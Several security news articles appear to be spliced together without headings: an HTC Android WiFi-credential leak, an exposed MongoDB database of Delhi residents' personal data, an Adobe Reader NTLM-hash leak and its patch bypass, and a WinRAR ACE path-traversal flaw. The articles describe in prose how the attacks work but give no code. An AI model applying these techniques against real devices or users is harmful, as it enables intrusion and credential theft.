Recently HTC acknowledged a vulnerability that can expose a user’s WiFi credentials, including the WiFi SSID and security passwords to a malicious app running on some of its Android phones. The vulnerability was discovered by the security architects Chris Hessing and Bret Jordan, and is published on the US-CERT Website also.

The vulnerability is due to an issue in certain Android models that allow an Android application with basic permissions (particularly ‘android.permission.ACCESS_WIFI_STATE’) to access all the stored WiFi credentials, including the respective SSIDs, user names and security passwords, belonging to various WPA/WPA2-PSK/802.1x based Wi-Fi networks. On the top of this, if an application also has internet permission (‘android.permission.INTERNET’), it can transfer the accessed list of WiFi credentials to a remote server.

Exposing the list of WiFi credentials to an unintended party or person without the user’s knowledge can have serious security implications if the former has malicious intent. Some of these include:

Unauthorized access to private WiFi networks: Gaining access to the list of WiFi credentials from a user’s mobile device, the simplest for a hacker to do is to intrude into corresponding private WiFi networks. The private network can be a home, campus or a corporate WiFi network. The intrusion will allow a hacker to carry a host of malicious activities on the network, such as installing malware on the network and scanning the network for confidential information/security vulnerabilities. Many corporates are adopting the BYOD (Bring Your Own Device) initiatives nowadays, giving access to corporate WiFi to the employee’s personal mobile devices. But, since personal devices lack strict corporate controls, vulnerabilities similar to this recently discovered one can be a serious security threat for corporates adopting BYOD schemes. All WiFi networks requiring a security passphrase (in case of WPA/WPA2-PSK security) or a combination of username and password (in case of WPA/WPA2-802.1x) can suffer intrusion by the potential exploitation of discovered vulnerability. In contrast, WiFi networks requiring digital certificates or SIM based authentication (in case of WPA/WPA2-802.1x) are potentially safe to intrusion attacks launched via vulnerability exploitation. 

Eavesdropping/Session hijacking on secured WiFi networks: Loosing the WiFi credentials of a WPA/WPA2-PSK WiFi network can be more damaging compared to WPA/WPA2-802.1x Wi-Fi network, because in the former all the WiFi clients of a particular network share a common security phrase. Therefore, an attacker having gained the SSID and security passphrase through the discovered vulnerability can sniff all the private encrypted WiFi communications happening over the associated WiFi network (using easily available hardware and software) and decode the same afterward or simultaneously using the available credentials. With the decoded traffic that can potentially reveal browser cookies, a hacker can potentially hijack an authorized user’s web session also. WPA/WPA2-PSK networks are popular among home and SOHO users, and therefore user’s online traffic, even though encrypted, is susceptible to eavesdropping and session hijacking when a hacker has gained necessary credentials illegally by exploiting the discovered vulnerability. 

Man-In-the-Middle attack on WiFi users: Loosing the WiFi credentials also enables a hacker to launch man-in-the-middle attack on connected users of affected WiFi network. The attack can potentially hurt the users due to leakage of confidential data or malware implantation. Although WPA/WPA2-PSK networks are more susceptible to man-in-the-middle, but exploiting the Hole196 Vulnerability, one can also do this attack on WPA/WPA2-802.1x networks too.

Potential loss of personal information: People often use WiFi hotspots for broadband access on their devices while they work, travel or visit various public places. And, many WiFi hotspots contain identity of their location in their SSID, therefore loosing the WiFi credentials also, including the SSID details, can potentially reveal a lot of information about a user to third-parties like company name, travelled places, etc. The personal information details can motivate crimes such as stalking. 

Looking at the damages of loosing out the list of WiFi credentials, the vulnerability discovery is very important from user’s security perspective considering the growing usage of Android-based mobile devices and WiFi networks across the world. Moreover, considering the open nature of Android market, malware exploiting the vulnerability can be easily developed and targeted toward the users of affected devices, posing a greater security concern for them. A fix for the vulnerability is already available and HTC has already said that many phones have received the fix through regular updates, but some users may need to manually update their phones. 

Hopefully, acknowledging the list of potential damages of the discovered vulnerability, mobile device users would be a bit more careful while selecting and installing an app on their device.

A security researcher has identified an unsecured server that was leaking detailed personal details of nearly half a million Indian citizens… thanks to another MongoDB database instance that company left unprotected on the Internet accessible to anyone without password.

In a report shared with The Hacker News, Bob Diachenko disclosed that two days ago he found a 4.1 GB-sized highly sensitive database online, named “GNCTD,” containing information collected on 458,388 individuals located in Delhi, including their Aadhaar numbers and voter ID numbers.

Though it’s not clear if the exposed database is linked to the Government of National Capital Territory of Delhi (GNCTD), Diachenko found that the database contains references and email addresses with “” domain for users registered with “senior supervisor,” and “super admin” designations.

Based upon the information available on Transerve Technologies website, it is a Goa-based company that specializes in smart city solutions and advanced data collection technology.

The company’s data collector, precision mapping and location intelligence tool help businesses across various sectors and Governments agencies to utilize Geo-location data to make smart decisions intelligently.

The leaked database contains the following tables:

  • EB Users (14,861 records)
  • Households (102,863 records)
  • Individuals (458,388 records)
  • Registered Users (399 records)
  • Users (2,983 records)

Analyzed by Diachenko, one of the database tables containing registered users includes email addresses, hashed passwords and usernames for administrator access.

delhi database leak
delhi database leak

“The most detailed information contained in ‘Individuals’ collection which was basically a pretty detailed portrait of a person, incl. health conditions, education, etc.,” Diachenko said.

“Households collection contained fields such as ‘name’, ‘house no’, ‘floor number’, ‘geolocation’, area details, ’email_ID’ of a supervisor, ‘is the household cooperating for survey’ field, ‘type of latrine’, ‘functional water meter’, ‘ration card number’, ‘internet facility available’ and even ‘informan name’ field.”

“It remains unknown just how long database was online and if anyone else accessed it,” Diachenko said.

When Transerve didn’t respond to the responsible disclosure sent via email, Diachenko contacted Indian CERT, which further coordinated with the company to take its exposed database offline immediately.

“The danger of having an exposed MongoDB or similar NoSQL databases is a huge risk. We have previously reported that the lack of authentication allowed the installation of malware or ransomware on thousands of MongoDB servers,” Diachenko said.

“The public configuration allows the possibility of cybercriminals to manage the whole system with full administrative privileges. Once the malware is in place, criminals could remotely access the server resources and even launch a code execution to steal or completely destroy any saved data the server contains.”

This isn’t the first time when MongoDB instances are found exposed to the Internet. In recent years, we have published several reports where unprotected database servers have already exposed billions of records.

None of this is MongoDBs fault, as administrators are always advised to follow the security checklist provided by the MongoDB maintainers.

Adobe has issued yet another patch for a critical vulnerability in its Acrobat Reader – a week after the original fix.

A week after Adobe fixed a critical zero-day vulnerability in its Acrobat Reader, the company issued another patch after a researcher dug up a way to bypass the original fix.

This previous vulnerability (CVE-2019-7089) was fixed in Adobe’s regularly scheduled security update last week. But Adobe said that its recent patch for the sensitive data leakage vulnerability, which could enable information disclosure, had a hole.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS,” said Adobe in its unscheduled Thursday update. “These updates address a reported bypass to the fix for CVE-2019-7089 first introduced in 2019.010.20091, 2017.011.30120 and 2015.006.30475 and released on February 12, 2019.

The zero-day vulnerability in Adobe Reader, disclosed by Alex Infuhr from cure53 in a Jan. 26 post, enabled bad actors to steal victims’ hashed password values, known as “NTLM hashes.”

The vulnerability allowed a PDF document to automatically send a server message block (SMB) request to an attacker’s server as soon as the document is opened.  SMB protocols enable an application or user of an application to access files on a remote server. Embedded in these SMB requests are NTLM hashes (NTLM is short for NT LAN Manager).

The critical vulnerability was temporarily patched last week by 0patch before Adobe issued its official patch. “This vulnerability… allows a remote attacker to steal user’s NTLM hash included in the SMB request,” said Mitja Kolsek with 0patch in a Monday post. “It also allows a document to ‘phone home’, i.e., to let the sender know that the user has viewed the document. Obviously, neither of these is desirable.”

And while Adobe patched the flaw last week, a bypass for the fix, tracked by CVE-2019-7815, exists and can ultimately lead to information disclosure: “Successful exploitation could lead to sensitive information disclosure in the context of the current user,” according to Adobe’s update.

Impacted are versions of Adobe Acrobat and Reader for Windows and macOS – specifically, Acrobat DC and Acrobat Reader DC continuous, versions 2019.010.20091 and earlier; Acrobat 2017 and Acrobat Reader 2017 Classic, versions 2017.011.30120 and earlier; and Acrobat DC and Acrobat Reader DC Classic 2015, versions 2015.006.30475 and earlier.

The update received a “priority 2” rating, meaning that it resolves vulnerabilities in a product that has historically been at elevated risk – but that there are currently no known exploits.

Infuhr, who discovered the proof of concept for the original vulnerability, was also credited with reporting the issue.

Users of the popular file-compression tool are urged to immediately update after a serious code-execution flaw was found in WinRAR. 

Popular Windows data compression tool WinRAR has patched a serious 19-year-old security flaw that was discovered on its platform, potentially impacting 500 million users.

The path-traversal vulnerability, which WinRAR fixed in January, could allow bad actors to remotely execute malicious code on victims’ machines – simply by persuading them to open a file, researchers with Check Point Software said on Wednesday.

“We found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain full control over a victim’s computer,” said Nadav Grossman with Check Point in the analysis. “The exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.”

WinRAR is a popular file-archiving utility for Windows, which can create and allow viewing of archives in Roshal Archive Compressed (RAR) or ZIP file formats, and unpack numerous archive file formats.

Researchers specifically found a path-traversal vulnerability in unacev2.dll, a third-party dynamic link library in WinRAR used for parsing ACE (a data compression archive file format) archives.

A path-traversal attack allows attackers to access directories that they should not be accessing, like config files or other files containing server data that is not intended for public.

When taking a closer look at unacev2.dll, researchers found that “it’s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn’t even need to bypass them,” said Grossman.

Due to the lack of protections and support for unacev2.dll, researchers were able to easily rename an ACE file and give it a RAR extension within unacev2.dll. When opened by WinRAR, the fake ACE file containing a malicious program is extracted to the system’s startup folder – so the program would automatically begin running when the system starts.

Ultimately, if a bad actor used spear-phishing tactics to send an unknowing victim a disguised ACE file, and the victim opened the file in WinRAR, the file would automatically extract in the victim’s startup folder and malware could then be quickly planted on the system.

The PoC makes use of a chain of vulnerabilities (CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253).

After researchers informed WinRAR of the issue, the vulnerability was patched in a new version of the software on Jan. 28, 5.70 . beta . 1.

A WinRAR spokesperson told Threatpost: “We have removed support for the ACE file format from WinRAR in the new Beta version 5.70.”

On an update on its website, WinRAR said: “WinRAR used this third-party library to unpack ACE archives. unacev2.dll had not been updated since 2005 and we do not have access to its source code. So we decided to drop ACE archive format support to protect security of WinRAR users.”

File-compression flaws have piqued the interest of exploit vendors such as Zerodium, who earlier last year offered up $10,000 for zero-day vulnerabilities in WinRAR and other compression platforms.